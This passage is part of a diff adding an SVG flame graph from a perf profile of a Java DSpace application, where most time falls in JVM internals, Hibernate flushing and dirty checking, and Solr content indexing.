+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.15%)</title><rect x="942.1" y="501" width="1.8" height="15.0" fill="rgb(103,249,103)" rx="2" ry="2" />
+<text  x="945.13" y="511.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (14 samples, 2.07%)</title><rect x="474.3" y="709" width="24.5" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="477.32" y="719.5" >_..</text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (1 samples, 0.15%)</title><rect x="945.6" y="325" width="1.8" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="948.62" y="335.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="837" width="1.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="292.29" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (1 samples, 0.15%)</title><rect x="917.7" y="549" width="1.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="920.69" y="559.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (13 samples, 1.92%)</title><rect x="1055.6" y="501" width="22.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1058.59" y="511.5" >s..</text>
+</g>
+<g >
+<title>_raw_spin_unlock_irqrestore (1 samples, 0.15%)</title><rect x="240.4" y="293" width="1.8" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="243.41" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (1 samples, 0.15%)</title><rect x="1076.5" y="405" width="1.8" height="15.0" fill="rgb(75,222,75)" rx="2" ry="2" />
+<text  x="1079.54" y="415.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (33 samples, 4.88%)</title><rect x="46.7" y="773" width="57.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="49.66" y="783.5" >finish..</text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadataFirstValue (1 samples, 0.15%)</title><rect x="942.1" y="533" width="1.8" height="15.0" fill="rgb(78,226,78)" rx="2" ry="2" />
+<text  x="945.13" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (7 samples, 1.04%)</title><rect x="1057.3" y="437" width="12.3" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="1060.34" y="447.5" ></text>
+</g>
+<g >
+<title>__local_bh_enable_ip (1 samples, 0.15%)</title><rect x="472.6" y="741" width="1.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="475.57" y="751.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (9 samples, 1.33%)</title><rect x="687.3" y="485" width="15.7" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="690.28" y="495.5" ></text>
+</g>
+<g >
+<title>fput (1 samples, 0.15%)</title><rect x="470.8" y="837" width="1.8" height="15.0" fill="rgb(250,122,122)" rx="2" ry="2" />
+<text  x="473.83" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.15%)</title><rect x="980.5" y="437" width="1.8" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="983.53" y="447.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (12 samples, 1.78%)</title><rect x="243.9" y="757" width="21.0" height="15.0" fill="rgb(237,103,103)" rx="2" ry="2" />
+<text  x="246.91" y="767.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultAutoFlushEventListener:::onAutoFlush (33 samples, 4.88%)</title><rect x="991.0" y="501" width="57.6" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="994.01" y="511.5" >org/hi..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (4 samples, 0.59%)</title><rect x="552.9" y="421" width="7.0" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="555.87" y="431.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="891.5" y="469" width="1.8" height="15.0" fill="rgb(51,201,51)" rx="2" ry="2" />
+<text  x="894.51" y="479.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (15 samples, 2.22%)</title><rect x="502.2" y="901" width="26.2" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="505.25" y="911.5" >e..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1050.4" y="405" width="1.7" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="1053.36" y="415.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (1 samples, 0.15%)</title><rect x="947.4" y="309" width="1.7" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="950.37" y="319.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.30%)</title><rect x="966.6" y="405" width="3.5" height="15.0" fill="rgb(106,252,106)" rx="2" ry="2" />
+<text  x="969.57" y="415.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (12 samples, 1.78%)</title><rect x="243.9" y="853" width="21.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="246.91" y="863.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.15%)</title><rect x="240.4" y="341" width="1.8" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="243.41" y="351.5" ></text>
+</g>
+<g >
+<title>schedule (14 samples, 2.07%)</title><rect x="474.3" y="757" width="24.5" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="477.32" y="767.5" >s..</text>
+</g>
+<g >
+<title>_raw_spin_unlock_irqrestore (1 samples, 0.15%)</title><rect x="514.5" y="453" width="1.7" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="517.47" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (1 samples, 0.15%)</title><rect x="942.1" y="517" width="1.8" height="15.0" fill="rgb(58,208,58)" rx="2" ry="2" />
+<text  x="945.13" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (46 samples, 6.80%)</title><rect x="163.6" y="741" width="80.3" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="166.61" y="751.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::reassociateIfUninitializedProxy (1 samples, 0.15%)</title><rect x="1012.0" y="437" width="1.7" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="1014.95" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::hydrate (1 samples, 0.15%)</title><rect x="914.2" y="357" width="1.7" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="917.20" y="367.5" ></text>
+</g>
+<g >
+<title>__slab_free (1 samples, 0.15%)</title><rect x="362.6" y="661" width="1.7" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="365.60" y="671.5" ></text>
+</g>
+<g >
+<title>start_thread (1 samples, 0.15%)</title><rect x="289.3" y="917" width="1.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="292.29" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/DSpaceBeanPostProcessor:::postProcessBeforeInitialization (2 samples, 0.30%)</title><rect x="1148.1" y="453" width="3.5" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="1151.11" y="463.5" ></text>
+</g>
+<g >
+<title>__schedule (18 samples, 2.66%)</title><rect x="292.8" y="789" width="31.4" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="295.78" y="799.5" >__..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingResultSet:::getTimestamp (1 samples, 0.15%)</title><rect x="914.2" y="309" width="1.7" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="917.20" y="319.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="884.5" y="485" width="1.8" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="887.53" y="495.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (34 samples, 5.03%)</title><rect x="44.9" y="853" width="59.4" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="47.91" y="863.5" >__x64_..</text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.15%)</title><rect x="968.3" y="309" width="1.8" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="971.31" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (17 samples, 2.51%)</title><rect x="544.1" y="501" width="29.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="547.14" y="511.5" >or..</text>
+</g>
+<g >
+<title>C1_CompilerThre (20 samples, 2.96%)</title><rect x="10.0" y="933" width="34.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="13.00" y="943.5" >C1..</text>
+</g>
+<g >
+<title>ip_output (8 samples, 1.18%)</title><rect x="509.2" y="725" width="14.0" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="512.23" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::convert (3 samples, 0.44%)</title><rect x="982.3" y="549" width="5.2" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="985.28" y="559.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (2 samples, 0.30%)</title><rect x="1038.1" y="437" width="3.5" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="1041.14" y="447.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (4 samples, 0.59%)</title><rect x="1169.1" y="197" width="6.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1172.05" y="207.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (1 samples, 0.15%)</title><rect x="933.4" y="373" width="1.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="936.40" y="383.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.15%)</title><rect x="945.6" y="229" width="1.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="948.62" y="239.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.15%)</title><rect x="950.9" y="373" width="1.7" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="953.86" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (7 samples, 1.04%)</title><rect x="1135.9" y="485" width="12.2" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="1138.89" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (17 samples, 2.51%)</title><rect x="544.1" y="485" width="29.7" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="547.14" y="495.5" >or..</text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::indexContent (152 samples, 22.49%)</title><rect x="912.5" y="597" width="265.3" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="915.46" y="607.5" >org/dspace/discovery/SolrServiceImp..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (1 samples, 0.15%)</title><rect x="1141.1" y="421" width="1.8" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="1144.12" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::isStale (5 samples, 0.74%)</title><rect x="1167.3" y="469" width="8.7" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="1170.31" y="479.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (20 samples, 2.96%)</title><rect x="10.0" y="869" width="34.9" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="13.00" y="879.5" >do..</text>
+</g>
+<g >
+<title>ext4_dirty_inode (1 samples, 0.15%)</title><rect x="945.6" y="85" width="1.8" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="948.62" y="95.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="1139.4" y="405" width="1.7" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1142.38" y="415.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.15%)</title><rect x="1167.3" y="261" width="1.8" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1170.31" y="271.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (11 samples, 1.63%)</title><rect x="545.9" y="437" width="19.2" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="548.89" y="447.5" ></text>
+</g>
+<g >
+<title>preempt_count_add (1 samples, 0.15%)</title><rect x="472.6" y="677" width="1.7" height="15.0" fill="rgb(215,71,71)" rx="2" ry="2" />
+<text  x="475.57" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.15%)</title><rect x="648.9" y="453" width="1.7" height="15.0" fill="rgb(67,215,67)" rx="2" ry="2" />
+<text  x="651.88" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (2 samples, 0.30%)</title><rect x="786.8" y="469" width="3.5" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="789.78" y="479.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (8 samples, 1.18%)</title><rect x="271.8" y="853" width="14.0" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="274.83" y="863.5" ></text>
+</g>
+<g >
+<title>java/util/TimSort:::sort (1 samples, 0.15%)</title><rect x="933.4" y="453" width="1.7" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="936.40" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (7 samples, 1.04%)</title><rect x="1135.9" y="469" width="12.2" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="1138.89" y="479.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (40 samples, 5.92%)</title><rect x="1078.3" y="517" width="69.8" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="1081.28" y="527.5" >sun/ref..</text>
+</g>
+<g >
+<title>all (676 samples, 100%)</title><rect x="10.0" y="949" width="1180.0" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="13.00" y="959.5" ></text>
+</g>
+<g >
+<title>ip_finish_output2 (7 samples, 1.04%)</title><rect x="509.2" y="709" width="12.2" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="512.23" y="719.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="270.1" y="709" width="1.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="273.09" y="719.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (3 samples, 0.44%)</title><rect x="586.0" y="437" width="5.3" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="589.04" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (6 samples, 0.89%)</title><rect x="896.7" y="469" width="10.5" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="899.75" y="479.5" ></text>
+</g>
+<g >
+<title>futex_wait (34 samples, 5.03%)</title><rect x="44.9" y="837" width="59.4" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="47.91" y="847.5" >futex_..</text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::hydrate (1 samples, 0.15%)</title><rect x="914.2" y="373" width="1.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="917.20" y="383.5" ></text>
+</g>
+<g >
+<title>futex_wait (19 samples, 2.81%)</title><rect x="10.0" y="837" width="33.2" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="13.00" y="847.5" >fu..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="530.2" y="453" width="1.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="533.18" y="463.5" ></text>
+</g>
+<g >
+<title>arch_perf_update_userpage (1 samples, 0.15%)</title><rect x="322.5" y="661" width="1.7" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="325.46" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::getKeys (2 samples, 0.30%)</title><rect x="1148.1" y="405" width="3.5" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="1151.11" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="359.1" y="789" width="1.8" height="15.0" fill="rgb(206,58,58)" rx="2" ry="2" />
+<text  x="362.11" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap$KeySet:::iterator (1 samples, 0.15%)</title><rect x="978.8" y="501" width="1.7" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="981.79" y="511.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceFileInfoPlugin:::additionalIndex (1 samples, 0.15%)</title><rect x="942.1" y="565" width="1.8" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="945.13" y="575.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.15%)</title><rect x="945.6" y="245" width="1.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="948.62" y="255.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="901" width="1.7" height="15.0" fill="rgb(219,79,79)" rx="2" ry="2" />
+<text  x="292.29" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.59%)</title><rect x="235.2" y="661" width="7.0" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="238.18" y="671.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.15%)</title><rect x="359.1" y="741" width="1.8" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="362.11" y="751.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (36 samples, 5.33%)</title><rect x="849.6" y="565" width="62.9" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="852.62" y="575.5" >org/hi..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="270.1" y="693" width="1.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="273.09" y="703.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.15%)</title><rect x="980.5" y="357" width="1.8" height="15.0" fill="rgb(93,239,93)" rx="2" ry="2" />
+<text  x="983.53" y="367.5" ></text>
+</g>
+<g >
+<title>java/net/URLEncoder:::encode (1 samples, 0.15%)</title><rect x="1163.8" y="517" width="1.8" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="1166.82" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (2 samples, 0.30%)</title><rect x="807.7" y="453" width="3.5" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="810.72" y="463.5" ></text>
+</g>
+<g >
+<title>hrtimer_wakeup (1 samples, 0.15%)</title><rect x="242.2" y="629" width="1.7" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="245.16" y="639.5" ></text>
+</g>
+<g >
+<title>preempt_count_sub (1 samples, 0.15%)</title><rect x="240.4" y="277" width="1.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="243.41" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="869" width="1.7" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="292.29" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/http/cookie/CookieSpecRegistry$1:::create (1 samples, 0.15%)</title><rect x="1160.3" y="437" width="1.8" height="15.0" fill="rgb(103,249,103)" rx="2" ry="2" />
+<text  x="1163.33" y="447.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="703.0" y="485" width="1.7" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="705.99" y="495.5" ></text>
+</g>
+<g >
+<title>syscall_trace_enter (1 samples, 0.15%)</title><rect x="327.7" y="773" width="1.7" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="330.69" y="783.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (17 samples, 2.51%)</title><rect x="11.7" y="757" width="29.7" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="14.75" y="767.5" >__..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="359.1" y="805" width="1.8" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="362.11" y="815.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (1 samples, 0.15%)</title><rect x="699.5" y="421" width="1.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="702.50" y="431.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (19 samples, 2.81%)</title><rect x="10.0" y="853" width="33.2" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="13.00" y="863.5" >__..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (8 samples, 1.18%)</title><rect x="758.8" y="453" width="14.0" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="761.85" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="914.2" y="293" width="1.7" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="917.20" y="303.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (17 samples, 2.51%)</title><rect x="470.8" y="901" width="29.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="473.83" y="911.5" >en..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="533" width="3.5" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="241.67" y="543.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (17 samples, 2.51%)</title><rect x="470.8" y="885" width="29.7" height="15.0" fill="rgb(212,67,67)" rx="2" ry="2" />
+<text  x="473.83" y="895.5" >do..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (3 samples, 0.44%)</title><rect x="579.1" y="421" width="5.2" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="582.05" y="431.5" ></text>
+</g>
+<g >
+<title>C2_CompilerThre (114 samples, 16.86%)</title><rect x="44.9" y="933" width="199.0" height="15.0" fill="rgb(235,100,100)" rx="2" ry="2" />
+<text  x="47.91" y="943.5" >C2_CompilerThre</text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (64 samples, 9.47%)</title><rect x="591.3" y="533" width="111.7" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="594.27" y="543.5" >org/hibernate..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (3 samples, 0.44%)</title><rect x="1064.3" y="405" width="5.3" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="1067.32" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.15%)</title><rect x="919.4" y="501" width="1.8" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="922.44" y="511.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="690.8" y="437" width="1.7" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="693.77" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (372 samples, 55.03%)</title><rect x="528.4" y="709" width="649.4" height="15.0" fill="rgb(253,128,128)" rx="2" ry="2" />
+<text  x="531.43" y="719.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (13 samples, 1.92%)</title><rect x="1055.6" y="453" width="22.7" height="15.0" fill="rgb(105,251,105)" rx="2" ry="2" />
+<text  x="1058.59" y="463.5" >o..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (5 samples, 0.74%)</title><rect x="1135.9" y="437" width="8.7" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="1138.89" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (11 samples, 1.63%)</title><rect x="739.6" y="453" width="19.2" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="742.64" y="463.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (6 samples, 0.89%)</title><rect x="511.0" y="645" width="10.4" height="15.0" fill="rgb(241,109,109)" rx="2" ry="2" />
+<text  x="513.98" y="655.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (12 samples, 1.78%)</title><rect x="329.4" y="821" width="21.0" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="332.44" y="831.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/JoinedSubclassEntityPersister:::discriminatorFragment (1 samples, 0.15%)</title><rect x="1053.8" y="405" width="1.8" height="15.0" fill="rgb(54,203,54)" rx="2" ry="2" />
+<text  x="1056.85" y="415.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (2 samples, 0.30%)</title><rect x="518.0" y="549" width="3.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="520.96" y="559.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (2 samples, 0.30%)</title><rect x="933.4" y="485" width="3.5" height="15.0" fill="rgb(78,225,78)" rx="2" ry="2" />
+<text  x="936.40" y="495.5" ></text>
+</g>
+<g >
+<title>__audit_syscall_exit (1 samples, 0.15%)</title><rect x="264.9" y="837" width="1.7" height="15.0" fill="rgb(218,77,77)" rx="2" ry="2" />
+<text  x="267.85" y="847.5" ></text>
+</g>
+<g >
+<title>Ljava/lang/ref/ReferenceQueue:::remove (3 samples, 0.44%)</title><rect x="266.6" y="757" width="5.2" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="269.60" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (4 samples, 0.59%)</title><rect x="1151.6" y="533" width="7.0" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1154.60" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::fireLoad (2 samples, 0.30%)</title><rect x="912.5" y="533" width="3.4" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="915.46" y="543.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (175 samples, 25.89%)</title><rect x="544.1" y="565" width="305.5" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="547.14" y="575.5" >org/dspace/core/HibernateDBConnection:::u..</text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (1 samples, 0.15%)</title><rect x="1149.9" y="373" width="1.7" height="15.0" fill="rgb(58,207,58)" rx="2" ry="2" />
+<text  x="1152.85" y="383.5" ></text>
+</g>
+<g >
